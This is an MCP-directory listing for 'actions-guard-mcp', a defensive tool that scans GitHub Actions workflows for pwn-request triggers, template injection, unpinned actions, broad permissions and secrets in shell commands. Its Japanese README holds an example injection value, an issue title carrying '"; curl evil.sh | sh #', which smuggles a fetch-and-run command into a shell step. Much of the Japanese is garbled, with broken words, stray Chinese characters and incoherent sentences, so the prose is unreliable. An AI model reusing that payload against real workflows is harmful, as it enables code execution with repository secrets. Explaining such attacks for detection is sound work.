Skip to main content
Glama
BerkantACUN

actions-guard-mcp

by BerkantACUN

actions-guard-mcp

GitHub Actions のワークフロー・セキュリティ・スキャナで、MCP ツールとして用公開されています。エージェントが「pwn リクエスト」やサプライチェーン攻撃の(实际のインシデントを、作っかした(CoreShop、stの、tj-actions など))パターンを、ワークフローファイルがコミットされるに — コミット後ではなく — 検出できるようにするためのものです。

これが存在する理由

GitHub Actions ワークフロー向けの静的解析は、成熟コ、よく理解されたコ分野です。izのmmor() は、正にこれを対する、信頼があり能動的にメンテンスされているスタンドアローソーすキャナです。まだ存しないのは、その稿の解析を本格的にリップする MCP ラッパーです。広い検索の検で見つけたプロジー1のジェクト(github-vulnerability)は、45 のチェックを組ンの設定・シークレット・サプライチェーンのをこ Actions を1 つの汎用ツールに散らしたものです — 12 スターら、5 ヶ月間作にコミットなら。ワークフロのセキュリティ・ビ所に、ディープな、エージェントがワークフローファイル能動中に書くこと・レビュー中に呼び出すものは、何もあり。

Related MCP server: vibecheck

検出するもの

  • 危険なトリガ(AGMCP-101)pull_request_target または workflow_run が、ref:repository: をトリガーとなった PR / ランそのもののフォークに指すチェックアウト・ステップと組み合わっているケース。これは CoreShop インシデントがジックトの同じ形です。ベース・リポジトリのトークンとシークレットで実ルが、トリガーのンたフォークのコーダをチュックアウトして実ルするワークフローです。

*テンプレート注込む(AGMCP-102)** — アのタッカの制御らされるコンテキスト(github.event.issue.titlegithub.event.pull_request.titlegithub.event.comment.bodygithub.head_reftoJSON(github.event)のペイロード全体ダンプなどからの) から構築された${{ ... }} 式が、env:を経由しれずにrun:に直接にステップ・インターンではなく直接挿入されているケース。古典的形はrun: echo "${{ github.event.issue.title }}"— のアン issue のタイトール"; curl evil.sh | sh #` を、そのポイの時点では文字列ではなくシェルです。

  • ピン付けれていないアクションと再利用可能ワークフロー(AGMCP-103)uses: --owner/repo@v4(タグ / ブランチ、両方変更可能)を使う代わりに、固定されたコミット SH を使う; ジョブレベルの再利用可能ワークフローの呼び出し(jobs.<id>.uses: owner/repo/.github/workflows/x.yml@main)が同じ様にピンされていない(もしくはdocker://image:tag@sha256: ダイジェストに固定されていない)。これは tj-actions 事件が使った「のソプライチェーン攻撃面」其のものです。不得勝されたタグが、バーションの上げるあることしに、それを用いる全員を悪意あるコードにポインドさせたのです。こうした事件の hidden 核心です。

  • 過剰な権限(AGMCP-104)permissions: write-all が、または明し的な広い scope な write スコープ(contentsactionspackages など)が、ワークフロー・レベルかジョブ・レベルのいずれ以下で、リスクのあるトリガーも持ったるワークフローに設定されえてある — より狭いスコープで足りるのに。

  • シェルにインターリ入されたシークレット(AGMCP-105)${{ secrets.X }}env: を経由せずに直接る run: ステップで使用す — 生のシークレット値が、環境変数ではなく、シェルのコマンド・ラインやプロセス一覧に不必要にサされるです。

すべてのマーカ・マッチング(AGMCP-101 / 102 / 105)でが、GitHub Actions の「ブラケット記法」プロパティ・アクセス(github.event['issue']['title'])を、相当しるドット記法に正規化し、大文字・小文字をを無视のないマッチします。表現言語ではその両方のが同一扱いられるからです。

既知なの制限

これはパターンマッチングです — ノーです。の「完全な GitHub Actions 式パーサでも、データフロー分析でもありません。${{ }} 式と with: / permissions: ブロックのテキスト、そのリテラルな文字列に照合てるものです。クリーン・スキャンとは「書かれたままの中に、既知の危険なパターンがい」を意味するのであって、ワークフローの安全性の保証ではありません。コノクリートにの:

  • クロス・ステープ / env: のデタフロー追跡のなし。 危険な値が、中間の env: 変数やステップの出力を経由し、チェックアウト・の ref:run: コマンドに到ル場合、AGMCP-101/102/み105 からは見えません — 検査対象のフィールドのリテラルなのみが検査されます。

  • 攻撃者が制御テキスト・マーカ一覧(AGMCP-102)は 有限で手動メンテされているセットであり、GitHub Actions が公開する、すべ のコンテキストールを網羅にある列挙で行の行の権はありません。リストアップされれい新種のフィールド存在していてもあります。

クリーンな結果がセキュリティの判断に関わるなら、そのを「最後の言葉」扱いせず、zizmor の、同ジュゴルのファイルに対しもっと深く、より汎用的な静的解析を行うので、このツールの代わりではなく、併用して実行する価値があります。

セットアップ

pip install actions-guard-mcp
actions-guard-mcp

セットアップは必要ありません — すべてのツールは、ワークフローファイルのパス、またはその生の YAML コンテンツを直引直接受け取ります。

状 態

アーリー・ビルド。

ライセンス

MIT

Install Server
A
license - permissive license
A
quality
C
maintenance

Maintenance

Maintainers
Response time
Release cycle
Releases (12mo)
Commit activity

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Related MCP Servers

  • A
    license
    A
    quality
    D
    maintenance
    An MCP server that enables AI agents to perform comprehensive GitHub security audits across org settings, repositories, Actions workflows, secrets, supply chain, and access control using 39 tools and 45 checks.
    39
    521
    12
    MIT
  • A
    license
    A
    quality
    B
    maintenance
    Agent-native "safe to ship?" security gate for AI-generated code. Uses real parsers and inter-rocedural taint analysis (JS/TS, Python, Go) to flag the classes AI coding agents get wrong — secrets, SQL injection, SS, SSRF, path traversal, command injection, weak JWT/CORS — and ranks findings by confidence. Exposes a scan tool over MCP.
    1
    6
    2
    MIT
  • A
    license
    A
    quality
    A
    maintenance
    Local-only GitHub Actions and CI maintenance scanner for AI-built apps. Exposes scan, explanation, and fix-planning tools to MCP clients; modifies nothing and makes no outbound requests by default.
    3
    63
    2
    MIT

View all related MCP servers

Related MCP Connectors

  • GitHub Actions workflow security audit - 21 checks: pinning, permissions, secrets, injection.

  • Scans MCP servers for tool poisoning, prompt injection and supply chain risks.

  • Screens public GitHub repos and PRs to generate risk maps, findings, and merge-readiness signals.

View all MCP Connectors

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/BerkantACUN/actions-guard-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server